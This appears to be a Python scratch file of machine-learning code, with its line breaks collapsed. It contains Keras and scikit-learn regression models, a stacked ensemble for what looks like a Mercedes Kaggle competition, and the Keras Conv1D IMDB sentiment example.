# define custom R2 metrics for Keras backend from keras import backend as K def r2_keras(y_true, y_pred): SS_res = K.sum(K.square( y_true - y_pred )) SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) ) return ( 1 - SS_res/(SS_tot + K.epsilon()) ) # base model architecture definition def model(): model = Sequential() #input layer model.add(Dense(input_dims, input_dim=input_dims)) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(Dropout(0.3)) # hidden layers model.add(Dense(input_dims)) model.add(BatchNormalization()) model.add(Activation(act_func)) model.add(Dropout(0.3)) model.add(Dense(input_dims//2)) model.add(BatchNormalization()) model.add(Activation(act_func)) model.add(Dropout(0.3)) model.add(Dense(input_dims//4, activation=act_func)) # output layer (y_pred) model.add(Dense(1, activation='linear')) # compile this model model.compile(loss='mean_squared_error', # one may use 'mean_absolute_error' as alternative optimizer='adam', metrics=[r2_keras] # you can add several if needed ) # Visualize NN architecture print(model.summary()) return model ################K2 import pandas as pd import numpy as np from sklearn.feature_selection import SelectFromModel from sklearn.linear_model import LassoCV from sklearn.model_selection import GridSearchCV from sklearn.preprocessing import RobustScaler from keras import backend as K from keras.models import Sequential from keras.layers import Dense, InputLayer, GaussianNoise from keras.wrappers.scikit_learn import KerasRegressor train = pd.read_csv('../input/train.csv') test = pd.read_csv('../input/test.csv') # # Data preparation # y_train = train['y'].values id_test = test['ID'] num_train = len(train) df_all = pd.concat([train, test]) df_all.drop(['ID', 'y'], axis=1, inplace=True) # One-hot encoding of categorical/strings df_all = pd.get_dummies(df_all, drop_first=True) # Sscaling features scaler = RobustScaler() df_all = scaler.fit_transform(df_all) train = df_all[:num_train] test = df_all[num_train:] # Keep only the most contributing features sfm = SelectFromModel(LassoCV()) sfm.fit(train, y_train) train = sfm.transform(train) test = sfm.transform(test) print ('Number of features : %d' % train.shape[1]) def r2_keras(y_true, y_pred): SS_res = K.sum(K.square( y_true - y_pred )) SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) ) return ( 1 - SS_res/(SS_tot + K.epsilon()) ) def build_model_fn(neurons=20, noise=0.25): model = Sequential() model.add(InputLayer(input_shape=(train.shape[1],))) model.add(GaussianNoise(noise)) model.add(Dense(neurons, activation='tanh')) model.add(Dense(1, activation='linear')) model.compile(loss='mean_squared_error', optimizer='nadam', metrics=[r2_keras]) return model # # Tuning model parameters # model = KerasRegressor(build_fn=build_model_fn, epochs=75, verbose=0) gsc = GridSearchCV( estimator=model, param_grid={ #'neurons': range(18,31,4), 'noise': [x/20.0 for x in range(3, 7)], }, #scoring='r2', scoring='neg_mean_squared_error', cv=5 ) grid_result = gsc.fit(train, y_train) print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_)) for test_mean, test_stdev, train_mean, train_stdev, param in zip( grid_result.cv_results_['mean_test_score'], grid_result.cv_results_['std_test_score'], grid_result.cv_results_['mean_train_score'], grid_result.cv_results_['std_train_score'], grid_result.cv_results_['params']): print("Train: %f (%f) // Test : %f (%f) with: %r" % (train_mean, train_stdev, test_mean, test_stdev, param)) # # Train model with best params for submission # model = build_model_fn(**grid_result.best_params_) model.fit(train, y_train, epochs=75, verbose=2) y_test = model.predict(test).flatten() df_sub = pd.DataFrame({'ID': id_test, 'y': y_test}) df_sub.to_csv('mercedes-submission.csv', index=False) ######################### import pandas as pd import numpy as np from sklearn.svm import SVR from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor from sklearn.decomposition import PCA, FastICA from sklearn.preprocessing import RobustScaler from sklearn.pipeline import make_pipeline, Pipeline, _name_estimators from sklearn.linear_model import ElasticNet, ElasticNetCV from sklearn.model_selection import cross_val_score, KFold from sklearn.metrics import r2_score from sklearn.base import BaseEstimator, TransformerMixin import xgboost as xgb train = pd.read_csv('../input/train.csv') test = pd.read_csv('../input/test.csv') y_train = train['y'].values y_mean = np.mean(y_train) id_test = test['ID'] num_train = len(train) df_all = pd.concat([train, test]) df_all.drop(['ID', 'y'], axis=1, inplace=True) # One-hot encoding of categorical/strings df_all = pd.get_dummies(df_all, drop_first=True) train = df_all[:num_train] test = df_all[num_train:] class AddColumns(BaseEstimator, TransformerMixin): def __init__(self, transform_=None): self.transform_ = transform_ def fit(self, X, y=None): self.transform_.fit(X, y) return self def transform(self, X, y=None): xform_data = self.transform_.transform(X, y) return np.append(X, xform_data, axis=1) class LogExpPipeline(Pipeline): def fit(self, X, y): super(LogExpPipeline, self).fit(X, np.log1p(y)) def predict(self, X): return np.expm1(super(LogExpPipeline, self).predict(X)) # # Model/pipeline with scaling,pca,svm # svm_pipe = LogExpPipeline(_name_estimators([RobustScaler(), PCA(), SVR(kernel='rbf', C=1.0, epsilon=0.05)])) # results = cross_val_score(svm_pipe, train, y_train, cv=5, scoring='r2') # print("SVM score: %.4f (%.4f)" % (results.mean(), results.std())) # exit() # # Model/pipeline with scaling,pca,ElasticNet # en_pipe = LogExpPipeline(_name_estimators([RobustScaler(), PCA(n_components=125), ElasticNet(alpha=0.001, l1_ratio=0.1)])) # # XGBoost model # xgb_model = xgb.sklearn.XGBRegressor(max_depth=4, learning_rate=0.005, subsample=0.921, objective='reg:linear', n_estimators=1300, base_score=y_mean) xgb_pipe = Pipeline(_name_estimators([AddColumns(transform_=PCA(n_components=10)), AddColumns(transform_=FastICA(n_components=10, max_iter=500)), xgb_model])) # results = cross_val_score(xgb_model, train, y_train, cv=5, scoring='r2') # print("XGB score: %.4f (%.4f)" % (results.mean(), results.std())) # # Random Forest # rf_model = RandomForestRegressor(n_estimators=250, n_jobs=4, min_samples_split=25, min_samples_leaf=25, max_depth=3) # results = cross_val_score(rf_model, train, y_train, cv=5, scoring='r2') # print("RF score: %.4f (%.4f)" % (results.mean(), results.std())) # # Now the training and stacking part. In previous version i just tried to train each model and # find the best combination, that lead to a horrible score (Overfit?). Code below does out-of-fold # training/predictions and then we combine the final results. # # Read here for more explanation (This code was borrowed/adapted) : # class Ensemble(object): def __init__(self, n_splits, stacker, base_models): self.n_splits = n_splits self.stacker = stacker self.base_models = base_models def fit_predict(self, X, y, T): X = np.array(X) y = np.array(y) T = np.array(T) folds = list(KFold(n_splits=self.n_splits, shuffle=True, random_state=2016).split(X, y)) S_train = np.zeros((X.shape[0], len(self.base_models))) S_test = np.zeros((T.shape[0], len(self.base_models))) for i, clf in enumerate(self.base_models): S_test_i = np.zeros((T.shape[0], self.n_splits)) for j, (train_idx, test_idx) in enumerate(folds): X_train = X[train_idx] y_train = y[train_idx] X_holdout = X[test_idx] y_holdout = y[test_idx] clf.fit(X_train, y_train) y_pred = clf.predict(X_holdout)[:] print ("Model %d fold %d score %f" % (i, j, r2_score(y_holdout, y_pred))) S_train[test_idx, i] = y_pred S_test_i[:, j] = clf.predict(T)[:] S_test[:, i] = S_test_i.mean(axis=1) # results = cross_val_score(self.stacker, S_train, y, cv=5, scoring='r2') # print("Stacker score: %.4f (%.4f)" % (results.mean(), results.std())) # exit() self.stacker.fit(S_train, y) res = self.stacker.predict(S_test)[:] return res stack = Ensemble(n_splits=5, #stacker=ElasticNetCV(l1_ratio=[x/10.0 for x in range(1,10)]), stacker=ElasticNet(l1_ratio=0.1, alpha=1.4), base_models=(svm_pipe, en_pipe, xgb_pipe, rf_model)) y_test = stack.fit_predict(train, y_train, test) df_sub = pd.DataFrame({'ID': id_test, 'y': y_test}) df_sub.to_csv('submission.csv', index=False) ############################# '''This example demonstrates the use of Convolution1D for text classification. Gets to 0.89 test accuracy after 2 epochs. 90s/epoch on Intel i5 2.4Ghz CPU. 10s/epoch on Tesla K40 GPU. ''' from __future__ import print_function from keras.preprocessing import sequence from keras.models import Sequential from keras.layers import Dense, Dropout, Activation from keras.layers import Embedding from keras.layers import Conv1D, GlobalMaxPooling1D from keras.datasets import imdb # set parameters: max_features = 5000 maxlen = 400 batch_size = 32 embedding_dims = 50 filters = 250 kernel_size = 3 hidden_dims = 250 epochs = 2 print('Loading data...') (x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features) print(len(x_train), 'train sequences') print(len(x_test), 'test sequences') print('Pad sequences (samples x time)') x_train = sequence.pad_sequences(x_train, maxlen=maxlen) x_test = sequence.pad_sequences(x_test, maxlen=maxlen) print('x_train shape:', x_train.shape) print('x_test shape:', x_test.shape) print('Build model...') model = Sequential() # we start off with an efficient embedding layer which maps # our vocab indices into embedding_dims dimensions model.add(Embedding(max_features, embedding_dims, input_length=maxlen)) model.add(Dropout(0.2)) # we add a Convolution1D, which will learn filters # word group filters of size filter_length: model.add(Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1)) # we use max pooling: model.add(GlobalMaxPooling1D()) # We add a vanilla hidden layer: model.add(Dense(hidden_dims)) model.add(Dropout(0.2)) model.add(Activation('relu')) # We project onto a single unit output layer, and squash it with a sigmoid: model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_data=(x_test, y_test))
31.643243
112
0.656389
2,020
0.172532
0
0
0
0
0
0
2,902
0.247865